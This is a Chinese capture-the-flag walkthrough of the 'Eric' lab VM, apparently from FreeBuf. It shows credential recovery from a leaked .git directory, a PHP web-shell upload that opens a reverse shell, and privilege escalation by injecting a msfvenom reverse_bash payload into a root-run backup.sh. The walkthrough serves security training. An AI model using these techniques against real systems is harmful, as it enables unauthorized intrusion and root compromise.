一，运行说明

       * 靶机难度：初级

       * 目       标：提权、获取flag

       * 运行环境：攻击机kali linux

                            靶机Eric

                            运行于VM VirtualBox中

       * 网络设置：均为Nat模式

       * Flag目录：/root/flag.txt

                           /home/eric/flag.txt

二、过程

          作者已经说明flag的具体位置，但是该有的操作还是要有的~

  1、前期信息搜集

          刚装好的靶机，当然是先要用nmap找到地址~。kali地址是10.0.2.4，靶机地址10.0.2.5

          可以看到开放了22和80端口，先在浏览器中打开看看。

          说是未完成的博客，好吧，再用nmap和dirbuster爆破，同时进行省时省力

           可以看到有admin.php，.git文件，upload目录等许多有用的东西，先看一下admin.php

           admin.php是一个登录页，直接爆破的话大概率是不可行的，账户密码应该会藏在别的地方，先继续看看

           源代码里也没啥

           使用Githack扫描目录，GitHack是一个.git泄露利用脚本，下载地址https://github.com/lijiejie/GitHack，下载后直接在python环境中运行即可

           扫描后的结果保存在本地以URL命名的文件夹中，可以看到admin.php及index.php的源码已经被还原，打开看一下

           找到了登陆用的账户密码，直接拿来登录去

     2、文件上传、反弹shell

           登录后是一个上传页面，看起来没有限定上传文件的格式

           直接上传木马试试

           然后在kali监听6666端口，浏览器访问upload目录下的6666.php

           很好，直接就成功了，不算很难嘛。直接su  –

          这个好办，几乎每次都会遇到。python3 -c ‘importpty;pty.spawn(“/bin/bash”)’

          作者已经告诉我们flag地址了，先找/home/eric/flag.txt

          在这个eric目录下，我们还发现了一个backup.sh文件，这个文件是以root身份运行的，并且具有所有的权限

          那么我们可以利用这个backup.sh文件提权到root，可以利用上次用到的msfvenom生成脚本

    3、提权

          kali本地执行msfvenom-p cmd/unix/reverse_bash lhost=10.0.2.4 lport=1234 R

          将生成的payload加载到backup.sh中去

          然后在本地监听1234端口，靶机中运行脚本

          以root身份进入靶机后即可查看第二个flag.txt

         至此结束，总体来说感觉不是很难~

关注我们

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，目前聚集了十多位专业的安全攻防技术研究人员，专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队，请关注团队官网: http://www.TideSec.net 或长按二维码关注公众号：

来源：freebuf.com 2019-11-07 09:33:00 by: 你伤不到我哒